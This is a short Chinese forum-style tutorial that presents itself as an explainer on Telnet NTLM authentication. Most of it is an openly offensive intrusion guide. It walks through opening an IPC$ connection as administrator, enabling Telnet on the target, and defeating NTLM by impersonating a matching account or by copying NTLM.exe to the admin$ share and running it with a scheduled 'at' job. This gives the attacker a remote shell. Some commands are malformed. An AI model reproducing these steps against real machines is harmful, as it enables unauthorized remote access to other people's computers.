Telnet身份验证也就是NTLM验证,是微软为了保证Telnet登录安全的一个验证体系。那么这个功能如何实现呢?这里我们就来详细介绍一下。由于Telnet功能太强大,而且也是入侵者使用最频繁的登录手段之一,因此微软公司添加了Telnet身份验证系统,称为NTLM验证,它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外,还需要满足NTLM验证关系.NTLM验证大大增强了Telnet主机的安全性,就像一只拦路虎把很多入侵者拒之门外.(关于NTLM我有写一个专门帖子.各位可以去看看)
Telnet身份验证1.使用Telnet连接主机
指令格式(cmd):Telnet 192.168.0.0 连接端口号
如果要断开.就是exit.
Telnet身份验证2.典型Telnet入侵攻略
第一步:建立IPC$连接
第二步:开启远程Telnet连接,首先在cmd(确定此时的根目录是目标的)输入指令.service 开启service项目.仔细找找.就有Telnet服务项.把它打开.
第三步:取消IPC$连接:net use 192.168.0.0 /del
第四步:去掉NTLM验证,如果没有去除目标上的NTLM验证,在登录目标的电脑的时候就会失败.
其实方法有很多种.就介绍最常用的一个.也是最简单的方法吧.
首先,在本地计算机上建立一个与远程主机上相同的账号和密码.
指令:net localgroup alpha /add不过确定对方的账号也是alpha.因为要相同的.
第二步:通过"开始"→"程序"→"附件"找到"命令提示符",使用鼠标右键单击"命令提示符",然后选择"属性".
在"以其他用户身份运行(U)"前面挑上挑.然后点."确定"接着.仍然按照上述路径找到"命令提示符"(cmd).之后用左健打开它.
之后写上用户名和密码.alpha的
然后点确定.得到cmd shell框.
之后输入我们的指令:Telnet 192.168.0.0
现在就会显示一个更新后的cmd shell.这个shell就192.168.0.0上的.
其实去掉Telnet身份验证的方法很多.再介绍给大家一个方法.
这个方法就是超级菜鸟话.因为我们需要用到一个工具.NTLM.exe.这个工具就像是3389.exe一样.只要把3389.exe传到一台机器上去执行.那台机器上的3389端口就会自动打开.
NTLM.exe的运作概念和3389.exe是一样的.我们需要做的就是把我们的NTLM.exe传到192.168.0.0这个机器上.
首先:开cmd.
然后输入指令:net use \\192.168.0.0\ipc$*""\user:administrator
之后再输入指令:copy c:\NTLM.exe \\192.168.0.0\admin$
解释一下:\admin$是使用192.168.0.0主机上的admin用户共享权限.
然后再输入察看时间指令:net time \\192.168.0.0
我们假如对方的时间是2007/9/21 下午3点21分.
之后再输入执行指令:at \\192.168.0.0 15:22 NTLM.exe
解释一下:15:22是24小时至的下午3点22分.cmd shell输入指令时一定要写24小时的.
之后当按回车确定后得到:新增加一项作业
或者是什么指令成功完成的提示字后.等待1分钟.让cmd完成我们的shell command.
之后我们再输入指令:Telnet 192.168.0.0
Ok.大功告成.
如果要恢复Telnet身份验证.我们要用到一个shell工具:resumeTelnet.exe
resumeTelnet.exe使用的方法是这样的.
命令格式:ResumeTelnet.exe \\\\server name password
其中server name是主机域名或者是IP都可以.我们就写192.168.0.0
password当然就是密码了.
回车确定.当显示the command completed successfully后.一切完成.